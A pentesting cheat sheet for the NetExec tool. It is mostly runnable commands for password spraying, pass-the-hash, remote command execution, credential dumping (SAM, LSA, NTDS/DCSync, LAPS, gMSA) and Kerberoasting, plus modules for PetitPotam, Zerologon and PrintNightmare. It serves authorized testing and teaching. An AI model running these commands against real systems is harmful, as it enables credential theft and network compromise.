โ† All cheat sheets

NETEXEC

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

NetExec (nxc) is the successor to CrackMapExec (CME).
Swiss army knife for network pentesting across multiple protocols.

INSTALLATION#

# pipx (recommended)
pipx install netexec

# pip
pip install netexec

# From source
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec && pip install .

# Kali
sudo apt install netexec

# Verify
nxc --version

GENERAL SYNTAX#

nxc <protocol> <target> [options]

Protocols: smb, ldap, winrm, ssh, mssql, rdp, ftp, wmi, vnc, nfs

Targets:   10.10.10.1           # Single IP
           10.10.10.0/24        # CIDR range
           targets.txt          # File with IPs
           10.10.10.1-50        # IP range

AUTHENTICATION#

# Password
nxc smb TARGET -u user -p 'password'
nxc smb TARGET -u user -p 'password' -d DOMAIN

# NTLM hash (pass-the-hash)
nxc smb TARGET -u user -H 'NTLM_HASH'
nxc smb TARGET -u user -H 'LM:NT'

# Kerberos
nxc smb TARGET -u user -p 'password' -k
nxc smb TARGET -u user -p 'password' --use-kcache   # Use ccache

# AES key
nxc smb TARGET -u user --aesKey AES256_KEY

# Null session
nxc smb TARGET -u '' -p ''

# Guest
nxc smb TARGET -u 'guest' -p ''

# User/password lists (spraying)
nxc smb TARGET -u users.txt -p 'password'           # Spray one pass
nxc smb TARGET -u users.txt -p passwords.txt         # All combos
nxc smb TARGET -u users.txt -p passwords.txt --no-bruteforce  # Paired

# Continue on success
nxc smb TARGET -u users.txt -p 'pass' --continue-on-success

SMB PROTOCOL#

# Enumerate hosts
nxc smb 10.10.10.0/24                                # OS, hostname, domain

# Share enumeration
nxc smb TARGET -u user -p pass --shares              # List shares
nxc smb TARGET -u user -p pass --shares --filter-shares READ WRITE
nxc smb TARGET -u user -p pass -M spider_plus        # Spider shares

# User enumeration
nxc smb TARGET -u user -p pass --users               # Domain users
nxc smb TARGET -u user -p pass --groups               # Domain groups
nxc smb TARGET -u user -p pass --loggedon-users       # Logged-on users
nxc smb TARGET -u user -p pass --sessions             # Active sessions
nxc smb TARGET -u user -p pass --rid-brute             # RID brute force

# Password policy
nxc smb TARGET -u user -p pass --pass-pol             # Password policy

# Execution methods
nxc smb TARGET -u admin -p pass -x 'whoami'           # cmd.exe
nxc smb TARGET -u admin -p pass -X 'Get-Process'      # PowerShell
nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method smbexec
nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method atexec
nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method wmiexec
nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method mmcexec
nxc smb TARGET -u admin -p pass -x 'whoami' --exec-method dcomexec

# File operations
nxc smb TARGET -u admin -p pass --put-file local.exe \\Windows\\Temp\\remote.exe
nxc smb TARGET -u admin -p pass --get-file \\Windows\\Temp\\file.txt local.txt

# SAM dump
nxc smb TARGET -u admin -p pass --sam                 # Dump SAM
nxc smb TARGET -u admin -p pass --lsa                 # Dump LSA secrets
nxc smb TARGET -u admin -p pass --ntds                # DCSync (NTDS.dit)
nxc smb TARGET -u admin -p pass --ntds --user admin   # Single user DCSync
nxc smb TARGET -u admin -p pass --dpapi               # DPAPI secrets
nxc smb TARGET -u admin -p pass --laps                # LAPS passwords

# GPP passwords
nxc smb TARGET -u user -p pass -M gpp_password
nxc smb TARGET -u user -p pass -M gpp_autologin

LDAP PROTOCOL#

# Enumeration
nxc ldap TARGET -u user -p pass --users               # All users
nxc ldap TARGET -u user -p pass --groups              # All groups
nxc ldap TARGET -u user -p pass --gmsa                # gMSA passwords
nxc ldap TARGET -u user -p pass --trusted-for-delegation

# Kerberoasting
nxc ldap TARGET -u user -p pass --kerberoasting
nxc ldap TARGET -u user -p pass --kerberoasting --kerberoast-output hashes.txt

# AS-REP roasting
nxc ldap TARGET -u user -p pass --asreproast
nxc ldap TARGET -u user -p pass --asreproast --asreproast-output hashes.txt

# BloodHound collection
nxc ldap TARGET -u user -p pass --bloodhound --ns DC_IP -c All
nxc ldap TARGET -u user -p pass --bloodhound --ns DC_IP -c DCOnly

# AD CS enumeration
nxc ldap TARGET -u user -p pass -M adcs
nxc ldap TARGET -u user -p pass -M adcs --options FQDN=ca.domain.local

# MAQ (MachineAccountQuota)
nxc ldap TARGET -u user -p pass -M maq

# Unconstrained delegation
nxc ldap TARGET -u user -p pass --trusted-for-delegation

# Password not required accounts
nxc ldap TARGET -u user -p pass -M user-desc          # User descriptions
nxc ldap TARGET -u user -p pass -M get-unixUserPassword

WINRM PROTOCOL#

nxc winrm TARGET -u user -p pass                     # Check access
nxc winrm TARGET -u user -p pass -x 'whoami'         # Execute cmd
nxc winrm TARGET -u user -p pass -X 'Get-Process'    # Execute PS

SSH PROTOCOL#

nxc ssh TARGET -u user -p pass                       # Check creds
nxc ssh TARGET -u user -p pass -x 'id'               # Execute command
nxc ssh TARGET -u user -p pass --key-file id_rsa     # Key auth
nxc ssh TARGET -u root -p pass --sudo                # Test sudo

MSSQL PROTOCOL#

nxc mssql TARGET -u user -p pass                     # Check access
nxc mssql TARGET -u user -p pass -q "SELECT @@version"  # Query
nxc mssql TARGET -u user -p pass -x 'whoami'         # xp_cmdshell
nxc mssql TARGET -u user -p pass --get-file C:\file local.txt
nxc mssql TARGET -u user -p pass --put-file local.exe C:\temp\file.exe
nxc mssql TARGET -u user -p pass -M mssql_priv       # Priv esc check

RDP PROTOCOL#

nxc rdp TARGET -u user -p pass                       # Check access
nxc rdp TARGET -u user -p pass --nla-screenshot      # NLA screenshot
nxc rdp TARGET -u user -p pass --screenshot          # After-auth screenshot

WMI PROTOCOL#

nxc wmi TARGET -u user -p pass                       # Check access
nxc wmi TARGET -u user -p pass -x 'whoami'           # Execute

MODULES#

# List all modules
nxc smb -L                                            # SMB modules
nxc ldap -L                                           # LDAP modules

# Module info
nxc smb -M spider_plus --options                     # Show module options

# Popular modules
nxc smb TARGET -u user -p pass -M spider_plus        # Spider shares
nxc smb TARGET -u user -p pass -M webdav             # Check WebDAV
nxc smb TARGET -u user -p pass -M petitpotam          # PetitPotam
nxc smb TARGET -u user -p pass -M zerologon          # Zerologon check
nxc smb TARGET -u user -p pass -M nopac              # noPac check
nxc smb TARGET -u user -p pass -M slinky             # Create LNK file
nxc smb TARGET -u user -p pass -M scuffy             # Create SCF file
nxc smb TARGET -u user -p pass -M enum_av            # Enumerate AV/EDR
nxc smb TARGET -u user -p pass -M ioxidresolver      # IOXIDResolver
nxc smb TARGET -u user -p pass -M printnightmare     # PrintNightmare

OUTPUT & LOGGING#

# Output formats
nxc smb TARGET -u user -p pass --log output.txt

# Database
nxc smb TARGET -u user -p pass                       # Auto-logs to DB
nxcdb                                                # Query database
nxcdb> export creds csv creds.csv                    # Export creds

# Highlight Pwn3d! hosts
# (Pwn3d!) = local admin access confirmed

MIGRATION FROM CRACKMAPEXEC#

# Command syntax is nearly identical
# Replace: crackmapexec / cme  โ†’  nxc / netexec
# Most CME modules work in NetExec
# Database format updated (use nxcdb instead of cmedb)
# Some module names may differ

COMMON WORKFLOWS#

# 1. Initial enumeration
nxc smb 10.10.10.0/24                                # Discover hosts
nxc smb 10.10.10.0/24 --gen-relay-list relay.txt     # SMB signing off

# 2. Password spray
nxc smb DC_IP -u users.txt -p 'Spring2024!' --continue-on-success

# 3. Validate creds across protocols
nxc smb TARGET -u user -p pass
nxc winrm TARGET -u user -p pass
nxc rdp TARGET -u user -p pass

# 4. Post-compromise enum
nxc smb 10.10.10.0/24 -u user -p pass --shares
nxc ldap DC_IP -u user -p pass --bloodhound --ns DC_IP

# 5. Credential harvesting
nxc smb TARGET -u admin -p pass --sam
nxc smb DC_IP -u da_user -p pass --ntds

TIPS#

  - (Pwn3d!) means you have local admin = can execute commands
  - Use --continue-on-success for password spraying
  - Use --no-bruteforce with user/pass files for paired testing
  - nxcdb stores all results; use it to avoid rescanning
  - Check SMB signing with --gen-relay-list for relay attacks
  - Most CME guides translate directly to nxc
  - Use -M enum_av before deploying payloads